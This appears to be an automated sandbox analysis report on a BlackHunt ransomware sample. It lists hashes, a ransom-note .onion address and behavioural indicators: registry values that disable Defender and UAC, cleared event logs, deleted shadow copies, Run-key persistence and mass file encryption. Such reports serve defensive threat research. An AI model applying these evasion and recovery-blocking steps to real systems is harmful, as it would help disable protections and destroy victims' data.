Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe
Resource
win10v2004-20231215-en
General
-
Target
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe
-
Size
707KB
-
MD5
51d9ae8d5ef9385579d3461c91a91a6a
-
SHA1
60cabd8495d2cc0f73d68f3fa714ccc49a0db510
-
SHA256
cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28
-
SHA512
a6d45bc3579ab9723c4229f5488a2f2b3af9e9a6c1f468196e4d83d6e988f428ccde96c7e990d00507d68bfd850a265dd89b85692731ed6ceeb383daab2c3aa2
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Ivnh:6uaTmkZJ+naie5OTamgEoKxLWE2h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2416 fsutil.exe 1584 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2016 wevtutil.exe 2696 wevtutil.exe 2068 wevtutil.exe 1612 wevtutil.exe 2792 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2140 bcdedit.exe 2820 bcdedit.exe 1656 bcdedit.exe 3604 bcdedit.exe -
Renames multiple (2902) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2180 wbadmin.exe 3148 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3332 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\G: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\P: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\X: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\S: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\K: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\N: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\Y: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\O: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\A: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\H: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\J: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\Z: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\B: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\M: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\W: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\E: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\U: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\I: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\L: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened (read-only) \??\V: cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground_PAL.wmv cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\plugins\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#BlackHunt_Private.key cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_ReadMe.txt cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.hta cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 912 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2764 vssadmin.exe 1996 vssadmin.exe 2424 vssadmin.exe 924 vssadmin.exe 844 vssadmin.exe 1000 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3584 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" svchost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2732 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3772 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeRestorePrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeBackupPrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeTakeOwnershipPrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeAuditPrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeSecurityPrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeIncBasePriorityPrivilege 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe Token: SeBackupPrivilege 2080 vssvc.exe Token: SeRestorePrivilege 2080 vssvc.exe Token: SeAuditPrivilege 2080 vssvc.exe Token: SeBackupPrivilege 3528 wbengine.exe Token: SeRestorePrivilege 3528 wbengine.exe Token: SeSecurityPrivilege 3528 wbengine.exe Token: SeSecurityPrivilege 2696 wevtutil.exe Token: SeBackupPrivilege 2696 wevtutil.exe Token: SeSecurityPrivilege 2792 wevtutil.exe Token: SeBackupPrivilege 2792 wevtutil.exe Token: SeSecurityPrivilege 2016 wevtutil.exe Token: SeBackupPrivilege 2016 wevtutil.exe Token: SeSecurityPrivilege 2068 wevtutil.exe Token: SeBackupPrivilege 2068 wevtutil.exe Token: SeSecurityPrivilege 1612 wevtutil.exe Token: SeBackupPrivilege 1612 wevtutil.exe Token: SeDebugPrivilege 3584 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3040 wrote to memory of 2220 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 109 PID 3040 wrote to memory of 2220 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 109 PID 3040 wrote to memory of 2220 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 109 PID 3040 wrote to memory of 2220 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 109 PID 3040 wrote to memory of 2892 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 107 PID 3040 wrote to memory of 2892 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 107 PID 3040 wrote to memory of 2892 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 107 PID 3040 wrote to memory of 2892 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 107 PID 3040 wrote to memory of 1060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 105 PID 3040 wrote to memory of 1060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 105 PID 3040 wrote to memory of 1060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 105 PID 3040 wrote to memory of 1060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 105 PID 2220 wrote to memory of 2728 2220 cmd.exe 103 PID 2220 wrote to memory of 2728 2220 cmd.exe 103 PID 2220 wrote to memory of 2728 2220 cmd.exe 103 PID 3040 wrote to memory of 2060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 32 PID 3040 wrote to memory of 2060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 32 PID 3040 wrote to memory of 2060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 32 PID 3040 wrote to memory of 2060 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 32 PID 3040 wrote to memory of 2784 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 30 PID 3040 wrote to memory of 2784 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 30 PID 3040 wrote to memory of 2784 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 30 PID 3040 wrote to memory of 2784 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 30 PID 3040 wrote to memory of 2828 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 101 PID 3040 wrote to memory of 2828 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 101 PID 3040 wrote to memory of 2828 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 101 PID 3040 wrote to memory of 2828 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 101 PID 2892 wrote to memory of 2976 2892 cmd.exe 152 PID 2892 wrote to memory of 2976 2892 cmd.exe 152 PID 2892 wrote to memory of 2976 2892 cmd.exe 152 PID 3040 wrote to memory of 2712 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 98 PID 3040 wrote to memory of 2712 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 98 PID 3040 wrote to memory of 2712 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 98 PID 3040 wrote to memory of 2712 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 98 PID 1060 wrote to memory of 2832 1060 cmd.exe 97 PID 1060 wrote to memory of 2832 1060 cmd.exe 97 PID 1060 wrote to memory of 2832 1060 cmd.exe 97 PID 3040 wrote to memory of 2836 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 95 PID 3040 wrote to memory of 2836 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 95 PID 3040 wrote to memory of 2836 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 95 PID 3040 wrote to memory of 2836 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 95 PID 3040 wrote to memory of 2268 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 33 PID 3040 wrote to memory of 2268 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 33 PID 3040 wrote to memory of 2268 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 33 PID 3040 wrote to memory of 2268 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 33 PID 3040 wrote to memory of 2700 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 93 PID 3040 wrote to memory of 2700 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 93 PID 3040 wrote to memory of 2700 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 93 PID 3040 wrote to memory of 2700 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 93 PID 3040 wrote to memory of 2192 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 90 PID 3040 wrote to memory of 2192 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 90 PID 3040 wrote to memory of 2192 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 90 PID 3040 wrote to memory of 2192 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 90 PID 2060 wrote to memory of 2608 2060 cmd.exe 91 PID 2060 wrote to memory of 2608 2060 cmd.exe 91 PID 2060 wrote to memory of 2608 2060 cmd.exe 91 PID 3040 wrote to memory of 2720 3040 cd94a43b7b05e19cfa7dc85f12387fdf6fa59528824e32eef642a01a95591c28.exe 34 PID 3040 wrote to 